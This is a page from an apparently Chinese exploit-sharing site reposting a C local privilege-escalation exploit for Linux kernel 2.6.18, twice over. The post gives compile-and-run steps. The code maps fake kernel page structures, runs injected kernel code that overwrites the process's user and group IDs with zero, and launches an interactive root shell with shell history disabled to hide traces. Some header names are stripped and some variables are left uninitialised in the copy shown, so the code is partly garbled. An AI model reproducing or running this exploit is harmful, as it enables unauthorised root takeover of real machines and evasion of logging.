2.6.18-238 local root exp

  • A+
所属分类:漏洞时代
摘要

[php]/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /’ / __ /’__`/ // /__ /’__`/ 0
* 0 //_, / ___ //_///_/ / / ___/ / ,_/// /// / _ ___ 1
* 1 //_// / /’ _ `/ /// //_/_/_ * 0 / / /// /// / / / /// / / /// /__// / /_/ / /_/ / / // 1
* 1 / /_/ /_/ /_/_/ / / /____// /____// /__// /____// /_/ 0
* 0 //_///_///_// /_/ //___/ //____/ //__/ //___/ //_/ 1
* 1 / /____/ >> Exploit database separated by exploit 0
* 0 //___/ type (local, remote, DoS, etc.) 1
* 1 0
* 0 2.6.18 Modified By CrosS 1
* 1 0
* 0 Linux 2011 1
* 1 0
* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18 Previously Coded by “Angel Injection” , couple of thanks for this, but
*
* it had errors while compiling, so this is modified version of this exploit
*
* working fine . Usage is given below..
*
* gcc -o exploit exploit.c
* chmod 777 exploit
* ./exploit
*
* Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ….. & all members of r00tw0rm.com ( RW ) .. )
*
* Submit Your Exploit at [email protected] | [email protected]
*
* For Educational purpose Only))
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include #include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) – 40)struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};void exit_code();
char exit_stack[1024 * 1024];void die(char *msg, int err)
{
printf(err ? “[-] %s: %s/n” : “[-] %s/n”, msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}#if defined (__i386__)#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246static_inline
void exit_kernel()
{
__asm__ __volatile__ (
“movl %0, 0x10(%%esp) ;”
“movl %1, 0x0c(%%esp) ;”
“movl %2, 0x08(%%esp) ;”
“movl %3, 0x04(%%esp) ;”
“movl %4, 0x00(%%esp) ;”
“iret”
: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),
“i” (USER_CS), “r” (exit_code)
);
}static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
“movl %%esp, %%eax ;”
“andl %1, %%eax ;”
“movl (%%eax), %0”
: “=r” (curr)
: “i” (~8191)
);
return (void *) curr;
}#elif defined (__x86_64__)#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246static_inline
void exit_kernel()
{
__asm__ __volatile__ (
“swapgs ;”
“movq %0, 0x20(%%rsp) ;”
“movq %1, 0x18(%%rsp) ;”
“movq %2, 0x10(%%rsp) ;”
“movq %3, 0x08(%%rsp) ;”
“movq %4, 0x00(%%rsp) ;”
“iretq”
: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),
“i” (USER_CS), “r” (exit_code)
);
}static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
“movq %%gs:(0), %0”
: “=r” (curr)
);
return (void *) curr;
}#else
#error “unsupported arch”
#endif#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endifstatic uint uid, gid;void kernel_code()
{
int i;
uint *p = get_current();for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; }exit_kernel(); }void exit_code() { if (getuid() != 0) die("wtf", 0);printf("[+] root/n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); }int main(int argc, char *argv[]) { int pi[2]; size_t map_size; char * map_addr; struct iovec iov; struct page * pages[5];uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid);if (!uid || !gid) die("[email protected]#$", 0);/*****/ pages[1] = pages[0] + 1;map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno);memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx/n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx/n", pages[0]); printf("[+] page: 0x%lx/n", pages[1]);pages[0]->flags = 1 << PG_compound; pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(“mmap”, errno);memset(map_addr, 0, map_size);
printf(“[+] mmap: 0x%lx .. 0x%lx/n”, map_addr, map_addr + map_size);
printf(“[+] page: 0x%lx/n”, pages[2]);
printf(“[+] page: 0x%lx/n”, pages[3]);pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;/*****/
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(“mmap”, errno);
memset(map_addr, 0, map_size);
printf(“[+] mmap: 0x%lx .. 0x%lx/n”, map_addr, map_addr + map_size);
printf(“[+] page: 0x%lx/n”, pages[4]);/*****/
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(“mmap”, errno);memset(map_addr, 0, map_size);
printf(“[+] mmap: 0x%lx .. 0x%lx/n”, map_addr, map_addr + map_size);/*****/
if (pipe(pi) < 0) die("pipe", errno); close(pi[0]);iov.iov_base = map_addr; iov.iov_len = ULONG_MAX;signal(SIGPIPE, exit_code); _vmsplice(pi[1], &iov, 1, 0); die("vmsplice", errno); return 0; }[/php]

本原创文章未经允许不得转载 | 当前页面:漏洞时代 – 最新漏洞_0DaY5.CoM » 2.6.18-238 local root exp 标签:没有标签 上一篇
Discuz的利用UC_KEY进行getshell 下一篇
phpMyWind又一注入(无视知道创宇补丁) 相关推荐 OrientDB <=2.22 代码执行 FineCMS SYS_KEY未初始化导致任意文件写入 Struts2高危漏洞S2-048动态分析 通杀FineCMS5.0.8及版本以下getshell漏洞的 finecms前台任意文件上传 FineCMS v2.1.5前台一处XSS+CSRF可getshell PHPCMS V9.6.2 SQL注入漏洞分析 Maccms8.x 命令执行漏洞分析 评论 取消 提交评论 昵称 邮箱 网址

[php]

/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /' / __ /'__`/ // /__ /'__`/ 0
* 0 //_, / ___ //_///_/ / / ___/ / ,_/// /// / _ ___ 1
* 1 //_// / /' _ `/ /// //_/_/_<_ > * 0 / / /// /// / / / /// / / /// /__// / /_/ / /_/ / / // 1
* 1 / /_/ /_/ /_/_/ / / /____// /____// /__// /____// /_/ 0
* 0 //_///_///_// /_/ //___/ //____/ //__/ //___/ //_/ 1
* 1 / /____/ >> Exploit database separated by exploit 0
* 0 //___/ type (local, remote, DoS, etc.) 1
* 1 0
* 0 2.6.18 Modified By CrosS 1
* 1 0
* 0 Linux 2011 1
* 1 0
* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18 Previously Coded by "Angel Injection" , couple of thanks for this, but
*
* it had errors while compiling, so this is modified version of this exploit
*
* working fine . Usage is given below..
*
* gcc -o exploit exploit.c
* chmod 777 exploit
* ./exploit
*
* Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of 1337day Team ) ..... & all members of r00tw0rm.com ( RW ) .. )
*
* Submit Your Exploit at [email protected] | [email protected]
*
* For Educational purpose Only))
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include #include
#include
#include
#include
#include
#define __KERNEL__
#include

#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
printf(err ? "[-] %s: %s/n" : "[-] %s/n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root/n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

if (!uid || !gid)
die("[email protected]#$", 0);

/*****/
pages[1] = pages[0] + 1;

map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx/n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx/n", pages[0]);
printf("[+] page: 0x%lx/n", pages[1]);

pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx/n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx/n", pages[2]);
printf("[+] page: 0x%lx/n", pages[3]);

pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx/n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx/n", pages[4]);

/*****/
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx/n", map_addr, map_addr + map_size);

/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}

[/php]

本原创文章未经允许不得转载 | 当前页面:漏洞时代 - 最新漏洞_0DaY5.CoM » 2.6.18-238 local root exp
标签:没有标签

评论